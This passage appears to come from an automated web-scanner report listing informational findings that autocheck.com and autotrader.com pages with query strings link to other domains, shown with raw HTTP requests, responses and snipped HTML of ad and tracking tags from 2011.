<li><a href="http://www.autocheck.com/?WT.mc_id=1824&siteID=1824" title="Vehicle History Reports">Vehicle History Reports</a>
...[SNIP]...
<li><a href="http://www.myproductadvisor.com/mpa/autobytel/setCookie.do?Return=http://www.autobytel.com/car-finder.htm" title="Car Finder" >
               My Advisor
           </a>
...[SNIP]...
<div>
<iframe src="http://ad.doubleclick.net/adi/abtl.home/lsuv;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?">
   </script>
   <noscript>
       <a href="http://ad.doubleclick.net/jump/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?"><img src="http://ad.doubleclick.net/ad/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?" border="0" height="78" width="369"></a>
...[SNIP]...
<div id="hp_adunit">
   <iframe src="http://ad.doubleclick.net/adi/abtl.home/fms;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?">
       </script>
       <noscript>
           <a href="http://ad.doubleclick.net/jump/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?"><IMG SRC="http://ad.doubleclick.net/ad/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?" border=0 height="93" width="586"></a>
...[SNIP]...
</a> |
               <a href="http://www.myride.com" class="footernav" >MYRIDE.COM</a>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<noscript>
           <iframe name="__bknsframe" height=0 width=0 frameborder=0 src="http://tags.bluekai.com/site/10?ret=html"></iframe>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>

       
       <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=autobytel_cs=1&betq=10221=416162" width="1" height="1" border="0" alt="">
       
       <!-- Tacoda Tracking Pixel: A. Newman 04/02/08 -->
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>


<!-- Start of Standard Pixel Code -->

   <img src='http://smp.specificmedia.com/smp/v=5;m=1;t=2568;ts=1295912323426' width='0' height='1' border='0' />

<!-- End of Standard Pixel Code -->
...[SNIP]...

20.559. http://www.autocheck.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autocheck.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autocheck.com/?WT.mc_id=1824&siteID=1824
The response contains the following links to other domains:
  • http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?
  • http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?
  • http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?
  • http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?
  • http://www.autocheckmembers.com/
  • http://www.experian.com/corporate/about-experian.html
  • http://www.experian.com/corporate/legalterms.html
  • http://www.googleadservices.com/pagead/conversion.js
  • http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&guid=ON&script=0
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css
  • https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
  • https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:54:12 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.19751295913252218; path=/; expires=Wed, 23-Feb-11 23:54:12 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=dmCvyWYCQne4gqVC62; path=/; expires=Wed, 23-Feb-2011 23:54:11 GMT
Set-Cookie: JSESSIONID=dmCvyWYCQne4gqVC62; path=/
Connection: close
Content-Type: text/html
Content-Length: 29237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1
...[SNIP]...
<link rel="stylesheet" href="/consumers/stylesheets/autocheck.css" type="text/css" />
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/assets/skins/sam/container.css" />

<!-- Overrides for Affiliate-->
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=exter022;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=bt-au511;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=srt-a283;ord=1?" width="1" height="1" frameborder="0" allowtransparency="true" style="background-color: transparent; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0);" ></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1071952197/?label=OL7xCOLnzQEQxeKS_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/about-experian.html">About
                       Experian</a>
...[SNIP]...
<li>
                   <a href="http://www.experian.com/corporate/legalterms.html">Site Terms &amp;
                       Conditions</a>
...[SNIP]...
<li>
                   <a href="http://www.autocheckmembers.com">Visit Our
                       Dealer Site</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js" ></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js"></script>
...[SNIP]...

20.560. http://www.autotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autotrader.com/?LNX=PTRDRFYCHP
The response contains the following links to other domains:

Request

GET /?LNX=PTRDRFYCHP HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:36 GMT
Server: Apache
Set-Cookie: JSESSIONID=D8688EFFE53F931FE65BCB1B8CD8B924; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:36 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=691168778.61475.0000; path=/
Content-Length: 60562


<!DOCTYPE html P
...[SNIP]...
<link rel="alternate" media="handheld" xhref="http://m.autotrader.com/" />


<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500" type="text/css" />


<style type="text/css">
...[SNIP]...
</style>


<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
</form>
<img id="fyc-corner-top" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500" class="iePNG"/>
<img id="fyc-corner-bottom" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500" class="iePNG"/>

<ul id="fyc-nav" class="clearfix"></ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
px%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=71015_1_TIMOFREASIER', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500" alt="Trade In Marketplace" title="Trade In Marketplace" width="440" height="248"/></a>
...[SNIP]...
mage" href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=77599_2_FYCNEWFNDNOW', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500" alt="Find New Cars" title="Find New Cars" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/research/new-cars/index.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76769_3_RESNEWFEELNG', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500" alt="New Car Research" title="New Car Research" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/top-tech.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76470_4_RESTPCTOPTEC', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500" alt="Top Car Tech" title="Top Car Tech" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/about/mobile-faq.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76859_5_MBLFAQPC2PKT', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500" alt="Mobile Phone" title="Mobile Phone" width="440" height="248"/></a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500" width="69" height="43" alt="Trade In Marketplace" title="Trade In Marketplace" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500" width="69" height="43" alt="Find New Cars" title="Find New Cars" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/research/new-cars/index.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500" width="69" height="43" alt="New Car Research" title="New Car Research" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/top-tech.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500" width="69" height="43" alt="Top Car Tech" title="Top Car Tech" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500" width="69" height="43" alt="Mobile Phone" title="Mobile Phone" class="thumb iePNG"/></a>
...[SNIP]...
<a href="http://www.autotrader.com/top-tech.jsp?rdpage=HPT2PROMO" >
<img id="tab-ad-one-promo-img" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_73307.jpg?v=3.17.167500" width="300" height="100" alt="Top Car Tech" />
</a>
...[SNIP]...
<li><a class="external-link" href="http://www.nadaguides.com/partner.aspx?adid=167244" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDMGNA1227', 'rdpage=HPTABRCH'], true).send();" title="Car valuation">What's my car worth?</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx">
<img src="http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500" alt="Trade-In Marketplace"/>
</a>
...[SNIP]...
<div class="module-seperator">
<img src="http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500" alt="" />
</div>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500" alt="SYC Center"/>
</a>
...[SNIP]...
<li id="autotrader-classics">

<a class="external-link" href="http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNTO1107'], true).send();">
<img src="http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500" alt="" id="atcClassic-logo"/>
<span>
...[SNIP]...
<div id="autotrader-classics-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
<li id="auto-mercado">

<a class="external-link" href="http://www.autotraderlatino.com?LNX=ATCAMHMPGBUSC" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNFC737'], true).send();">
<img id="atcLatino-logo" src="http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500" alt=""/>
<span>
...[SNIP]...
<div id="autotrader-latino-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
</script>

<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;" id="atcDealsOnWheels-logo" src="http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500" alt=""/>
<div style="float: left;cursor:pointer;" id="dow_text">
...[SNIP]...
</a>
<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;padding-left:6px;padding-top:4px;" src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" id="dow_offsite"/>
</a>
...[SNIP]...
</div>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500" />

<div id="intlRedirectModal">
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.carmony.co.uk">
<img src="http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500"/>Take me to Carmony.co.uk, AutoTrader.com&reg;'s sister site, to look for cars in the U.K.
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.allapprovedcars.be">
<img src="http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500"/>Take me to AllApprovedCars.be, AutoTrader.com&reg;'s sister site, to look for cars in Belgium
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div style="display:none;"><img src="http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295913396727&kd=autotraderhomepage" width="0" height="0" alt="Adify"/></div>

<div style="display:none;"><img src="http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295913396728?yumehomepage" width="0" height="0" alt="YuMe"/></div>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.561. http://www.autotrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autotrader.com/?LNX=PTRDRFYCHP
The response contains the following links to other domains:

Request

GET /?LNX=PTRDRFYCHP HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:14:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Wed, 01-Feb-2012 14:14:07 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3794953738.61475.0000; path=/
Content-Length: 60558


<!DOCTYPE html P
...[SNIP]...
<link rel="alternate" media="handheld" xhref="http://m.autotrader.com/" />


<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/css-reset.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/master.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b1.css?v=3.17.167500" type="text/css" />


<style type="text/css">
...[SNIP]...
</style>


<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
